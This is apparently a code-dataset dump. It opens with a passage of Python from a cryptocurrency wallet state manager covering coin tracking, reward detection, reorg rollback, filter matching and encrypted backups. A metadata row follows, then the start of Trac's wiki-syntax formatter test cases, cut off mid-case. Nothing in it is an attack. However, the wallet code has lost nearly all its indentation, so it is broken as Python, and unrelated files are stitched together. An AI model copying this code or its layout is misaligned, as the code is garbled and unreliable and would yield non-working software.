async def unconfirmed_removals_for_wallet(self, wallet_id: int) -> Dict[bytes32, Coin]:
"""
        Returns removals from transactions that have not been confirmed yet.
"""
removals: Dict[bytes32, Coin] = {}
unconfirmed_tx = await self.tx_store.get_unconfirmed_for_wallet(wallet_id)
for record in unconfirmed_tx:
for coin in record.removals:
removals[coin.name()] = coin
return removals
async def new_transaction_block_callback(
self,
removals: List[Coin],
additions: List[Coin],
block: BlockRecord,
additional_coin_spends: List[CoinSpend],
):
height: uint32 = block.height
for coin in additions:
await self.puzzle_hash_created(coin)
trade_additions, added = await self.coins_of_interest_added(additions, block)
trade_removals, removed = await self.coins_of_interest_removed(removals, height)
if len(trade_additions) > 0 or len(trade_removals) > 0:
await self.trade_manager.coins_of_interest_farmed(trade_removals, trade_additions, height)
if len(additional_coin_spends) > 0:
created_pool_wallet_ids: List[int] = []
for cs in additional_coin_spends:
if cs.coin.puzzle_hash == SINGLETON_LAUNCHER_HASH:
already_have = False
pool_state = None
for wallet_id, wallet in self.wallets.items():
if (
wallet.type() == WalletType.POOLING_WALLET
and (await wallet.get_current_state()).launcher_id == cs.coin.name()
):
self.log.warning("Already have, not recreating")
already_have = True
if not already_have:
try:
pool_state = solution_to_pool_state(cs)
except Exception as e:
self.log.debug(f"Not a pool wallet launcher {e}")
continue
if pool_state is None:
self.log.debug("Not a pool wallet launcher")
continue
self.log.info("Found created launcher. Creating pool wallet")
pool_wallet = await PoolWallet.create(
self, self.main_wallet, cs.coin.name(), additional_coin_spends, height, True, "pool_wallet"
)
created_pool_wallet_ids.append(pool_wallet.wallet_id)
for wallet_id, wallet in self.wallets.items():
if wallet.type() == WalletType.POOLING_WALLET:
await wallet.apply_state_transitions(additional_coin_spends, height)
added_notified = set()
removed_notified = set()
for coin_record in added:
if coin_record.wallet_id in added_notified:
continue
added_notified.add(coin_record.wallet_id)
self.state_changed("coin_added", coin_record.wallet_id)
for coin_record in removed:
if coin_record.wallet_id in removed_notified:
continue
removed_notified.add(coin_record.wallet_id)
self.state_changed("coin_removed", coin_record.wallet_id)
self.tx_pending_changed()
async def coins_of_interest_added(
self, coins: List[Coin], block: BlockRecord
) -> Tuple[List[Coin], List[WalletCoinRecord]]:
(
trade_removals,
trade_additions,
) = await self.trade_manager.get_coins_of_interest()
trade_adds: List[Coin] = []
height = block.height
pool_rewards = set()
farmer_rewards = set()
added = []
prev = await self.blockchain.get_block_record_from_db(block.prev_hash)
# [block 1] [block 2] [tx block 3] [block 4] [block 5] [tx block 6]
# [tx block 6] will contain rewards for [block 1] [block 2] [tx block 3]
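        # Reward coins are only paid out in the next transaction block, and
        # their parent coin ids are deterministic functions of (height,
        # GENESIS_CHALLENGE). The two loops below collect the expected
        # pool/farmer parent ids for every height back to (and including) the
        # previous transaction block, so reward coins among `additions` can be
        # flagged as coinbase / fee rewards further down.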
while prev is not None:
# step 1 find previous block
if prev.is_transaction_block:
break
prev = await self.blockchain.get_block_record_from_db(prev.prev_hash)
if prev is not None:
# include last block
pool_parent = pool_parent_id(uint32(prev.height), self.constants.GENESIS_CHALLENGE)
farmer_parent = farmer_parent_id(uint32(prev.height), self.constants.GENESIS_CHALLENGE)
pool_rewards.add(pool_parent)
farmer_rewards.add(farmer_parent)
prev = await self.blockchain.get_block_record_from_db(prev.prev_hash)
while prev is not None:
# step 2 traverse from previous block to the block before it
pool_parent = pool_parent_id(uint32(prev.height), self.constants.GENESIS_CHALLENGE)
farmer_parent = farmer_parent_id(uint32(prev.height), self.constants.GENESIS_CHALLENGE)
pool_rewards.add(pool_parent)
farmer_rewards.add(farmer_parent)
if prev.is_transaction_block:
break
prev = await self.blockchain.get_block_record_from_db(prev.prev_hash)
wallet_ids: Set[int] = set()
for coin in coins:
info = await self.puzzle_store.wallet_info_for_puzzle_hash(coin.puzzle_hash)
if info is not None:
wallet_ids.add(info[0])
all_outgoing_tx: Dict[int, List[TransactionRecord]] = {}
for wallet_id in wallet_ids:
all_outgoing_tx[wallet_id] = await self.tx_store.get_all_transactions_for_wallet(
wallet_id, TransactionType.OUTGOING_TX
)
for coin in coins:
if coin.name() in trade_additions:
trade_adds.append(coin)
is_coinbase = False
is_fee_reward = False
if coin.parent_coin_info in pool_rewards:
is_coinbase = True
if coin.parent_coin_info in farmer_rewards:
is_fee_reward = True
info = await self.puzzle_store.wallet_info_for_puzzle_hash(coin.puzzle_hash)
if info is not None:
wallet_id, wallet_type = info
added_coin_record = await self.coin_added(
coin,
is_coinbase,
is_fee_reward,
uint32(wallet_id),
wallet_type,
height,
all_outgoing_tx.get(wallet_id, []),
)
added.append(added_coin_record)
else:
interested_wallet_id = await self.interested_store.get_interested_puzzle_hash_wallet_id(
puzzle_hash=coin.puzzle_hash
)
if interested_wallet_id is not None:
wallet_type = self.wallets[uint32(interested_wallet_id)].type()
added_coin_record = await self.coin_added(
coin,
is_coinbase,
is_fee_reward,
uint32(interested_wallet_id),
wallet_type,
height,
all_outgoing_tx.get(interested_wallet_id, []),
)
added.append(added_coin_record)
derivation_index = await self.puzzle_store.index_for_puzzle_hash(coin.puzzle_hash)
if derivation_index is not None:
await self.puzzle_store.set_used_up_to(derivation_index, True)
return trade_adds, added
async def coins_of_interest_removed(
self, coins: List[Coin], height: uint32
) -> Tuple[List[Coin], List[WalletCoinRecord]]:
# This gets called when coins of our interest are spent on chain
if len(coins) > 0:
self.log.info(f"Coins removed {coins} at height: {height}")
(
trade_removals,
trade_additions,
) = await self.trade_manager.get_coins_of_interest()
# Keep track of trade coins that are removed
trade_coin_removed: List[Coin] = []
removed = []
all_unconfirmed: List[TransactionRecord] = await self.tx_store.get_all_unconfirmed()
for coin in coins:
record = await self.coin_store.get_coin_record(coin.name())
if coin.name() in trade_removals:
trade_coin_removed.append(coin)
if record is None:
self.log.info(f"Record for removed coin {coin.name()} is None. (ephemeral)")
else:
await self.coin_store.set_spent(coin.name(), height)
for unconfirmed_record in all_unconfirmed:
for rem_coin in unconfirmed_record.removals:
if rem_coin.name() == coin.name():
self.log.info(f"Setting tx_id: {unconfirmed_record.name} to confirmed")
await self.tx_store.set_confirmed(unconfirmed_record.name, height)
if record is not None:
removed.append(record)
return trade_coin_removed, removed
async def coin_added(
self,
coin: Coin,
coinbase: bool,
fee_reward: bool,
wallet_id: uint32,
wallet_type: WalletType,
height: uint32,
all_outgoing_transaction_records: List[TransactionRecord],
) -> WalletCoinRecord:
"""
Adding coin to DB
"""
self.log.info(f"Adding coin: {coin} at {height}")
farm_reward = False
if coinbase or fee_reward:
farm_reward = True
now = uint64(int(time.time()))
if coinbase:
tx_type: int = TransactionType.COINBASE_REWARD.value
else:
tx_type = TransactionType.FEE_REWARD.value
tx_record = TransactionRecord(
confirmed_at_height=uint32(height),
created_at_time=now,
to_puzzle_hash=coin.puzzle_hash,
amount=coin.amount,
fee_amount=uint64(0),
confirmed=True,
sent=uint32(0),
spend_bundle=None,
additions=[coin],
removals=[],
wallet_id=wallet_id,
sent_to=[],
trade_id=None,
type=uint32(tx_type),
name=coin.name(),
)
await self.tx_store.add_transaction_record(tx_record, True)
else:
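            # Not a farming reward: decide whether this coin is change from one of
            # our own outgoing transactions or a brand new incoming payment.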
records: List[TransactionRecord] = []
for record in all_outgoing_transaction_records:
for add_coin in record.additions:
if add_coin.name() == coin.name():
records.append(record)
if len(records) > 0:
# This is the change from this transaction
for record in records:
if record.confirmed is False:
await self.tx_store.set_confirmed(record.name, height)
else:
now = uint64(int(time.time()))
tx_record = TransactionRecord(
confirmed_at_height=uint32(height),
created_at_time=now,
to_puzzle_hash=coin.puzzle_hash,
amount=coin.amount,
fee_amount=uint64(0),
confirmed=True,
sent=uint32(0),
spend_bundle=None,
additions=[coin],
removals=[],
wallet_id=wallet_id,
sent_to=[],
trade_id=None,
type=uint32(TransactionType.INCOMING_TX.value),
name=coin.name(),
)
if coin.amount > 0:
await self.tx_store.add_transaction_record(tx_record, True)
coin_record: WalletCoinRecord = WalletCoinRecord(
coin, height, uint32(0), False, farm_reward, wallet_type, wallet_id
)
await self.coin_store.add_coin_record(coin_record)
if wallet_type == WalletType.COLOURED_COIN or wallet_type == WalletType.DISTRIBUTED_ID:
wallet = self.wallets[wallet_id]
await wallet.coin_added(coin, height)
return coin_record
async def add_pending_transaction(self, tx_record: TransactionRecord):
"""
Called from wallet before new transaction is sent to the full_node
"""
        # Wallet node will use this queue to retry sending this transaction until a full node receives it
await self.tx_store.add_transaction_record(tx_record, False)
self.tx_pending_changed()
self.state_changed("pending_transaction", tx_record.wallet_id)
async def add_transaction(self, tx_record: TransactionRecord):
"""
        Called from wallet to add a transaction that is not being sent to the full_node
"""
await self.tx_store.add_transaction_record(tx_record, False)
self.state_changed("pending_transaction", tx_record.wallet_id)
async def remove_from_queue(
self,
spendbundle_id: bytes32,
name: str,
send_status: MempoolInclusionStatus,
error: Optional[Err],
):
"""
Full node received our transaction, no need to keep it in queue anymore
"""
updated = await self.tx_store.increment_sent(spendbundle_id, name, send_status, error)
if updated:
tx: Optional[TransactionRecord] = await self.get_transaction(spendbundle_id)
if tx is not None:
self.state_changed("tx_update", tx.wallet_id, {"transaction": tx})
async def get_all_transactions(self, wallet_id: int) -> List[TransactionRecord]:
"""
Retrieves all confirmed and pending transactions
"""
records = await self.tx_store.get_all_transactions_for_wallet(wallet_id)
return records
async def get_transaction(self, tx_id: bytes32) -> Optional[TransactionRecord]:
return await self.tx_store.get_transaction_record(tx_id)
async def get_filter_additions_removals(
self, new_block: HeaderBlock, transactions_filter: bytes, fork_point_with_peak: Optional[uint32]
) -> Tuple[List[bytes32], List[bytes32]]:
"""Returns a list of our coin ids, and a list of puzzle_hashes that positively match with provided filter."""
# assert new_block.prev_header_hash in self.blockchain.blocks
tx_filter = PyBIP158([b for b in transactions_filter])
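        # The BIP158 filter lets us test which of our coin ids / puzzle hashes may
        # appear in this block without fetching the full block contents.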
# Find fork point
if fork_point_with_peak is not None:
fork_h: int = fork_point_with_peak
elif new_block.prev_header_hash != self.constants.GENESIS_CHALLENGE and self.peak is not None:
block_record = await self.blockchain.get_block_record_from_db(self.peak.header_hash)
# this may return -1, in case there is no shared ancestor block
fork_h = find_fork_point_in_chain(
self.blockchain,
block_record,
new_block,
)
else:
fork_h = 0
# Get all unspent coins
my_coin_records: Set[WalletCoinRecord] = await self.coin_store.get_unspent_coins_at_height(
uint32(fork_h) if fork_h >= 0 else None
)
# Filter coins up to and including fork point
unspent_coin_names: Set[bytes32] = set()
for coin in my_coin_records:
if coin.confirmed_block_height <= fork_h:
unspent_coin_names.add(coin.name())
# Get all blocks after fork point up to but not including this block
if new_block.height > 0:
curr: BlockRecord = self.blockchain.block_record(new_block.prev_hash)
reorg_blocks: List[HeaderBlockRecord] = []
while curr.height > fork_h:
header_block_record = await self.block_store.get_header_block_record(curr.header_hash)
assert header_block_record is not None
reorg_blocks.append(header_block_record)
if curr.height == 0:
break
curr = await self.blockchain.get_block_record_from_db(curr.prev_hash)
reorg_blocks.reverse()
# For each block, process additions to get all Coins, then process removals to get unspent coins
for reorg_block in reorg_blocks:
for addition in reorg_block.additions:
unspent_coin_names.add(addition.name())
for removal in reorg_block.removals:
record = await self.puzzle_store.get_derivation_record_for_puzzle_hash(removal.puzzle_hash)
if record is None:
continue
unspent_coin_names.remove(removal.name())
my_puzzle_hashes = self.puzzle_store.all_puzzle_hashes
        removals_of_interest: List[bytes32] = []
        additions_of_interest: List[bytes32] = []
(
trade_removals,
trade_additions,
) = await self.trade_manager.get_coins_of_interest()
for name, trade_coin in trade_removals.items():
if tx_filter.Match(bytearray(trade_coin.name())):
removals_of_interest.append(trade_coin.name())
for name, trade_coin in trade_additions.items():
if tx_filter.Match(bytearray(trade_coin.puzzle_hash)):
additions_of_interest.append(trade_coin.puzzle_hash)
for coin_name in unspent_coin_names:
if tx_filter.Match(bytearray(coin_name)):
removals_of_interest.append(coin_name)
for puzzle_hash in my_puzzle_hashes:
if tx_filter.Match(bytearray(puzzle_hash)):
additions_of_interest.append(puzzle_hash)
for coin_id in await self.interested_store.get_interested_coin_ids():
if tx_filter.Match(bytearray(coin_id)):
removals_of_interest.append(coin_id)
for puzzle_hash, _ in await self.interested_store.get_interested_puzzle_hashes():
if tx_filter.Match(bytearray(puzzle_hash)):
additions_of_interest.append(puzzle_hash)
return additions_of_interest, removals_of_interest
async def is_addition_relevant(self, addition: Coin):
"""
Check whether we care about a new addition (puzzle_hash). Returns true if we
control this puzzle hash.
"""
result = await self.puzzle_store.puzzle_hash_exists(addition.puzzle_hash)
return result
async def get_wallet_for_coin(self, coin_id: bytes32) -> Any:
coin_record = await self.coin_store.get_coin_record(coin_id)
if coin_record is None:
return None
wallet_id = uint32(coin_record.wallet_id)
wallet = self.wallets[wallet_id]
return wallet
async def reorg_rollback(self, height: int):
"""
Rolls back and updates the coin_store and transaction store. It's possible this height
is the tip, or even beyond the tip.
"""
await self.coin_store.rollback_to_block(height)
reorged: List[TransactionRecord] = await self.tx_store.get_transaction_above(height)
await self.tx_store.rollback_to_block(height)
for record in reorged:
if record.type in [
TransactionType.OUTGOING_TX,
TransactionType.OUTGOING_TRADE,
TransactionType.INCOMING_TRADE,
]:
await self.tx_store.tx_reorged(record)
# Removes wallets that were created from a blockchain transaction which got reorged.
remove_ids = []
for wallet_id, wallet in self.wallets.items():
if wallet.type() == WalletType.POOLING_WALLET.value:
remove: bool = await wallet.rewind(height)
if remove:
remove_ids.append(wallet_id)
for wallet_id in remove_ids:
await self.user_store.delete_wallet(wallet_id, in_transaction=True)
self.wallets.pop(wallet_id)
self.new_peak_callbacks.pop(wallet_id)
async def close_all_stores(self) -> None:
if self.blockchain is not None:
self.blockchain.shut_down()
await self.db_connection.close()
async def clear_all_stores(self):
await self.coin_store._clear_database()
await self.tx_store._clear_database()
await self.puzzle_store._clear_database()
await self.user_store._clear_database()
await self.basic_store._clear_database()
def unlink_db(self):
Path(self.db_path).unlink()
async def get_all_wallet_info_entries(self) -> List[WalletInfo]:
return await self.user_store.get_all_wallet_info_entries()
async def get_start_height(self):
"""
        If we already have a coin, use the height of the first coin as the starting
        height next time; otherwise use the peak.
"""
first_coin_height = await self.coin_store.get_first_coin_height()
if first_coin_height is None:
start_height = self.blockchain.get_peak()
else:
start_height = first_coin_height
return start_height
async def create_wallet_backup(self, file_path: Path):
all_wallets = await self.get_all_wallet_info_entries()
for wallet in all_wallets:
if wallet.id == 1:
all_wallets.remove(wallet)
break
backup_pk = master_sk_to_backup_sk(self.private_key)
now = uint64(int(time.time()))
wallet_backup = WalletInfoBackup(all_wallets)
backup: Dict[str, Any] = {}
data = wallet_backup.to_json_dict()
data["version"] = __version__
data["fingerprint"] = self.private_key.get_g1().get_fingerprint()
data["timestamp"] = now
data["start_height"] = await self.get_start_height()
key_base_64 = base64.b64encode(bytes(backup_pk))
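        # The BLS backup secret key doubles as the symmetric key material: the backup
        # payload is Fernet-encrypted with it and signed below with AugSchemeMPL.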
f = Fernet(key_base_64)
data_bytes = json.dumps(data).encode()
encrypted = f.encrypt(data_bytes)
meta_data: Dict[str, Any] = {"timestamp": now, "pubkey": bytes(backup_pk.get_g1()).hex()}
meta_data_bytes = json.dumps(meta_data).encode()
signature = bytes(AugSchemeMPL.sign(backup_pk, std_hash(encrypted) + std_hash(meta_data_bytes))).hex()
backup["data"] = encrypted.decode()
backup["meta_data"] = meta_data
backup["signature"] = signature
backup_file_text = json.dumps(backup)
file_path.write_text(backup_file_text)
async def import_backup_info(self, file_path) -> None:
json_dict = open_backup_file(file_path, self.private_key)
wallet_list_json = json_dict["data"]["wallet_list"]
for wallet_info in wallet_list_json:
await self.user_store.create_wallet(
wallet_info["name"],
wallet_info["type"],
wallet_info["data"],
wallet_info["id"],
)
await self.load_wallets()
await self.user_settings.user_imported_backup()
await self.create_more_puzzle_hashes(from_zero=True)
async def get_wallet_for_colour(self, colour):
for wallet_id in self.wallets:
wallet = self.wallets[wallet_id]
if wallet.type() == WalletType.COLOURED_COIN:
if bytes(wallet.cc_info.my_genesis_checker).hex() == colour:
return wallet
return None
async def add_new_wallet(self, wallet: Any, wallet_id: int, create_puzzle_hashes=True):
self.wallets[uint32(wallet_id)] = wallet
if create_puzzle_hashes:
await self.create_more_puzzle_hashes()
    # Search the block records and return the most recent block (height and header
    # hash) whose transactions filter matches a given puzzlehash.
async def search_blockrecords_for_puzzlehash(self, puzzlehash: bytes32):
header_hash_of_interest = None
highest_block_height = 0
peak: Optional[BlockRecord] = self.blockchain.get_peak()
if peak is None:
return None, None
peak_block: Optional[HeaderBlockRecord] = await self.blockchain.block_store.get_header_block_record(
peak.header_hash
)
while peak_block is not None:
tx_filter = PyBIP158([b for b in peak_block.header.transactions_filter])
if tx_filter.Match(bytearray(puzzlehash)) and peak_block.height > highest_block_height:
header_hash_of_interest = peak_block.header_hash
highest_block_height = peak_block.height
break
else:
peak_block = await self.blockchain.block_store.get_header_block_record(
peak_block.header.prev_header_hash
)
return highest_block_height, header_hash_of_interest
async def get_spendable_coins_for_wallet(self, wallet_id: int, records=None) -> Set[WalletCoinRecord]:
if self.peak is None:
return set()
if records is None:
records = await self.coin_store.get_unspent_coins_for_wallet(wallet_id)
# Coins that are currently part of a transaction
unconfirmed_tx: List[TransactionRecord] = await self.tx_store.get_unconfirmed_for_wallet(wallet_id)
removal_dict: Dict[bytes32, Coin] = {}
for tx in unconfirmed_tx:
for coin in tx.removals:
# TODO, "if" might not be necessary once unconfirmed tx doesn't contain coins for other wallets
if await self.does_coin_belong_to_wallet(coin, wallet_id):
removal_dict[coin.name()] = coin
# Coins that are part of the trade
offer_locked_coins: Dict[bytes32, WalletCoinRecord] = await self.trade_manager.get_locked_coins()
filtered = set()
for record in records:
if record.coin.name() in offer_locked_coins:
continue
if record.coin.name() in removal_dict:
continue
filtered.add(record)
return filtered
async def create_action(
self, name: str, wallet_id: int, wallet_type: int, callback: str, done: bool, data: str, in_transaction: bool
):
await self.action_store.create_action(name, wallet_id, wallet_type, callback, done, data, in_transaction)
self.tx_pending_changed()
async def set_action_done(self, action_id: int):
await self.action_store.action_done(action_id)
    async def generator_received(self, height: uint32, header_hash: bytes32, program: Program):
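        # Replay any pending "request_generator" wallet actions whose stored height
        # and header hash match the generator that just arrived.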
actions: List[WalletAction] = await self.action_store.get_all_pending_actions()
for action in actions:
data = json.loads(action.data)
action_data = data["data"]["action_data"]
if action.name == "request_generator":
stored_header_hash = bytes32(hexstr_to_bytes(action_data["header_hash"]))
stored_height = uint32(action_data["height"])
if stored_header_hash == header_hash and stored_height == height:
if action.done:
return None
wallet = self.wallets[uint32(action.wallet_id)]
callback_str = action.wallet_callback
if callback_str is not None:
callback = getattr(wallet, callback_str)
await callback(height, header_hash, program, action.id)
async def puzzle_solution_received(self, response: RespondPuzzleSolution):
unwrapped: PuzzleSolutionResponse = response.response
actions: List[WalletAction] = await self.action_store.get_all_pending_actions()
for action in actions:
data = json.loads(action.data)
action_data = data["data"]["action_data"]
if action.name == "request_puzzle_solution":
stored_coin_name = bytes32(hexstr_to_bytes(action_data["coin_name"]))
height = uint32(action_data["height"])
if stored_coin_name == unwrapped.coin_name and height == unwrapped.height:
if action.done:
return None
wallet = self.wallets[uint32(action.wallet_id)]
callback_str = action.wallet_callback
if callback_str is not None:
callback = getattr(wallet, callback_str)
await callback(unwrapped, action.id)
def get_peak(self) -> Optional[BlockRecord]:
return self.blockchain.get_peak()
async def get_next_interesting_coin_ids(self, spend: CoinSpend, in_transaction: bool) -> List[bytes32]:
pool_wallet_interested: List[bytes32] = PoolWallet.get_next_interesting_coin_ids(spend)
for coin_id in pool_wallet_interested:
await self.interested_store.add_interested_coin_id(coin_id, in_transaction)
return pool_wallet_interested
async def new_peak(self):
peak: Optional[BlockRecord] = self.get_peak()
if peak is None:
return
for wallet_id, callback in self.new_peak_callbacks.items():
await callback(peak)
| 42.899921 | 119 | 0.636536 |
a493eeac430bf5d7292a96035c3bdc9679c43550
| 36,327 |
py
|
Python
|
trac/wiki/tests/wikisyntax.py
|
clubturbo/Trac-1.4.2
|
254ce54a3c2fb86b4f31810ddeabbd4ff8b54a78
|
[
"BSD-3-Clause"
] | null | null | null |
trac/wiki/tests/wikisyntax.py
|
clubturbo/Trac-1.4.2
|
254ce54a3c2fb86b4f31810ddeabbd4ff8b54a78
|
[
"BSD-3-Clause"
] | null | null | null |
trac/wiki/tests/wikisyntax.py
|
clubturbo/Trac-1.4.2
|
254ce54a3c2fb86b4f31810ddeabbd4ff8b54a78
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2006-2020 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at https://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at https://trac.edgewall.org/log/.
import unittest
from trac.util.datefmt import datetime_now, utc
from trac.wiki.model import WikiPage
from trac.wiki.tests import formatter
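# Each test case below follows the formatter test layout: a '=====' title line, the
# wiki source, a '-----' separator, the expected rendered HTML and, in some cases, a
# second '-----' separator followed by the expected one-line rendering.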
TEST_CASES = u"""
============================== wiki: link resolver
wiki:TestPage
wiki:TestPage/
wiki:/TestPage
[wiki:/TestPage]
[wiki:/TestPage ]
[wiki:/TestPage\u200B]
[wiki:/TestPage /TestPage]
wiki:"Space 1 23"
wiki:"C'est l'\xe9t\xe9"
wiki:MissingPage
wiki:12
wiki:abc
------------------------------
<p>
<a class="wiki" href="/wiki/TestPage">wiki:TestPage</a>
<a class="wiki" href="/wiki/TestPage">wiki:TestPage/</a>
<a class="wiki" href="/wiki/TestPage">wiki:/TestPage</a>
<a class="wiki" href="/wiki/TestPage">TestPage</a>
<a class="wiki" href="/wiki/TestPage">TestPage</a>
<a class="wiki" href="/wiki/TestPage">TestPage</a>
<a class="wiki" href="/wiki/TestPage">/TestPage</a>
<a class="wiki" href="/wiki/Space%201%2023">wiki:"Space 1 23"</a>
<a class="wiki" href="/wiki/C'est%20l'%C3%A9t%C3%A9">wiki:"C'est l'\xe9t\xe9"</a>
<a class="missing wiki" href="/wiki/MissingPage" rel="nofollow">wiki:MissingPage</a>
<a class="missing wiki" href="/wiki/12" rel="nofollow">wiki:12</a>
<a class="missing wiki" href="/wiki/abc" rel="nofollow">wiki:abc</a>
</p>
------------------------------
============================== wiki: link resolver + query and fragment
wiki:TestPage?format=txt
wiki:TestPage/?version=12
wiki:TestPage/?action=diff&version=12
wiki:"Space 1 23#heading"
------------------------------
<p>
<a class="wiki" href="/wiki/TestPage?format=txt">wiki:TestPage?format=txt</a>
<a class="wiki" href="/wiki/TestPage?version=12">wiki:TestPage/?version=12</a>
<a class="wiki" href="/wiki/TestPage?action=diff&version=12">wiki:TestPage/?action=diff&version=12</a>
<a class="wiki" href="/wiki/Space%201%2023#heading">wiki:"Space 1 23#heading"</a>
</p>
------------------------------
============================== WikiPageNames conformance
CamelCase AlabamA ABc AlaBamA FooBar
------------------------------
<p>
<a class="missing wiki" href="/wiki/CamelCase" rel="nofollow">CamelCase</a> AlabamA ABc AlaBamA <a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a>
</p>
------------------------------
============================== WikiPageNames conformance (unicode)
SmÅogstore should produce a link
and so should wiki:ÜberflüssigkeitsTheorie
------------------------------
<p>
<a class="missing wiki" href="/wiki/Sm%C3%85ogstore" rel="nofollow">SmÅogstore</a> should produce a link
and so should <a class="missing wiki" href="/wiki/%C3%9Cberfl%C3%BCssigkeitsTheorie" rel="nofollow">wiki:ÜberflüssigkeitsTheorie</a>
</p>
------------------------------
============================== More WikiPageNames conformance
CamelCase,CamelCase.CamelCase: CamelCase
But not CamelCase2
nor CamelCase_
------------------------------
<p>
<a class="missing wiki" href="/wiki/CamelCase" rel="nofollow">CamelCase</a>,<a class="missing wiki" href="/wiki/CamelCase" rel="nofollow">CamelCase</a>.<a class="missing wiki" href="/wiki/CamelCase" rel="nofollow">CamelCase</a>: <a class="missing wiki" href="/wiki/CamelCase" rel="nofollow">CamelCase</a>
But not CamelCase2
nor CamelCase_
</p>
------------------------------
============================== Escaping WikiPageNames
!CamelCase
------------------------------
<p>
CamelCase
</p>
------------------------------
============================== WikiPageNames endings
foo (FooBar )
foo FooBar: something
foo FooBar.
FooBar, foo
foo FooBar;
foo FooBar!
foo FooBar?
foo (FooBar)
foo {FooBar}
foo 'FooBar'
foo "FooBar"
foo [FooBar]
------------------------------
<p>
foo (<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a> )
foo <a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a>: something
foo <a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a>.
<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a>, foo
foo <a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a>;
foo <a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a>!
foo <a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a>?
foo (<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a>)
foo {<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a>}
foo '<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a>'
foo "<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a>"
foo [<a class="missing wiki" href="/wiki/FooBar" rel="nofollow">FooBar</a>]
</p>
------------------------------
============================== WikiPageNames counter examples
A0B1, ST62T53C6, IR32V1H000
------------------------------
<p>
A0B1, ST62T53C6, IR32V1H000
</p>
------------------------------
============================== WikiPageNames with fragment identifier
SandBox#heading-fixed-id
wiki:TracSubversion#TracandSubversion1.3.1. etc.
TracSubversion#TracandSubversion1.3.1. etc.
------------------------------
<p>
<a class="missing wiki" href="/wiki/SandBox#heading-fixed-id" rel="nofollow">SandBox#heading-fixed-id</a>
</p>
<p>
<a class="missing wiki" href="/wiki/TracSubversion#TracandSubversion1.3.1" rel="nofollow">wiki:TracSubversion#TracandSubversion1.3.1</a>. etc.
<a class="missing wiki" href="/wiki/TracSubversion#TracandSubversion1.3.1" rel="nofollow">TracSubversion#TracandSubversion1.3.1</a>. etc.
</p>
------------------------------
============================== WikiPageNames with fragment id (performance test)
BillOfMaterials#get_bill_of_materials_from_room_xml(fpxml=nil)
[BillOfMaterials#get_bill_of_materials_from_room_xml(fpxml=nil)]
[BillOfMaterials#get_bill_of_materials_from_room_xml(fpxml=nil) speed]
------------------------------
<p>
<a class="missing wiki" href="/wiki/BillOfMaterials#get_bill_of_materials_from_room_xml" rel="nofollow">BillOfMaterials#get_bill_of_materials_from_room_xml</a>(fpxml=nil)
</p>
<p>
[<a class="missing wiki" href="/wiki/BillOfMaterials#get_bill_of_materials_from_room_xml" rel="nofollow">BillOfMaterials#get_bill_of_materials_from_room_xml</a>(fpxml=nil)]
</p>
<p>
[<a class="missing wiki" href="/wiki/BillOfMaterials#get_bill_of_materials_from_room_xml" rel="nofollow">BillOfMaterials#get_bill_of_materials_from_room_xml</a>(fpxml=nil) speed]
</p>
------------------------------
============================== WikiPageNames counter examples (paths)
/absolute/path/is/NotWiki and relative/path/is/NotWiki and ../higher/is/NotWiki
but ThisIs/SubWiki and now This/Also
and ../Relative/Camel or /Absolute/Camel as well
------------------------------
<p>
/absolute/path/is/NotWiki and relative/path/is/NotWiki and ../higher/is/NotWiki
but <a class="missing wiki" href="/wiki/ThisIs/SubWiki" rel="nofollow">ThisIs/SubWiki</a> and now <a class="missing wiki" href="/wiki/This/Also" rel="nofollow">This/Also</a>
and <a class="missing wiki" href="/wiki/Relative/Camel" rel="nofollow">../Relative/Camel</a> or <a class="missing wiki" href="/wiki/Absolute/Camel" rel="nofollow">/Absolute/Camel</a> as well
</p>
------------------------------
============================== WikiPageNames counter examples (numbers)
8FjBpOmy
anotherWikiPageName
------------------------------
<p>
8FjBpOmy
anotherWikiPageName
</p>
------------------------------
8FjBpOmy
anotherWikiPageName
============================== WikiPageNames counter examples (unicode)
Småbokstaver should not produce a link
neither should AbAbÅ nor AbAbÅÅb
------------------------------
<p>
Småbokstaver should not produce a link
neither should AbAbÅ nor AbAbÅÅb
</p>
------------------------------
Småbokstaver should not produce a link
neither should AbAbÅ nor AbAbÅÅb
============================== not a WikiPageNames at all (#9025 regression)
[ሀሁሂሃሄህሆለሉሊላሌልሎሏሐሑሒሓሔሕሖመሙሚማሜምሞሟሠሡሢሣሤሥሦረሩሪራሬርሮሯሰሱሲሳሴስሶሷሸሹሺሻሼሽሾሿቀቁቂቃቄቅቆቈቊቋቌቍቐቑቒቓቔቕቖቘቚቛቜቝበቡቢባቤብቦቧቨቩቪቫቬቭቮቯተቱቲታቴትቶቷቸቹቺቻቼችቾቿኀኁኂኃኄኅኆኈኊኋኌኍነኑኒናኔንኖኗኘኙኚኛኜኝኞኟአኡኢኣኤእኦኧከኩኪካኬክኮኰኲኳኴኵኸኹኺኻኼኽኾወዉዊዋዌውዎዐዑዒዓዔዕዖዘዙዚዛዜዝዞዟዠዡዢዣዤዥዦዧየዩዪያዬይዮደዱዲዳዴድዶዷጀጁጂጃጄጅጆጇገጉጊጋጌግጎጐጒጓጔጕጠጡጢጣጤጥጦጧጨጩጪጫጬጭጮጯጰጱጲጳጴጵጶጷጸጹጺጻጼጽጾጿፀፁፂፃፄፅፆፈፉፊፋፌፍፎፏፐፑፒፓፔፕፖፗፘፙፚ፩፪፫፬፭፮፯፰፱፲፳፴፵፶፷፸፹፺፻]
------------------------------
<p>
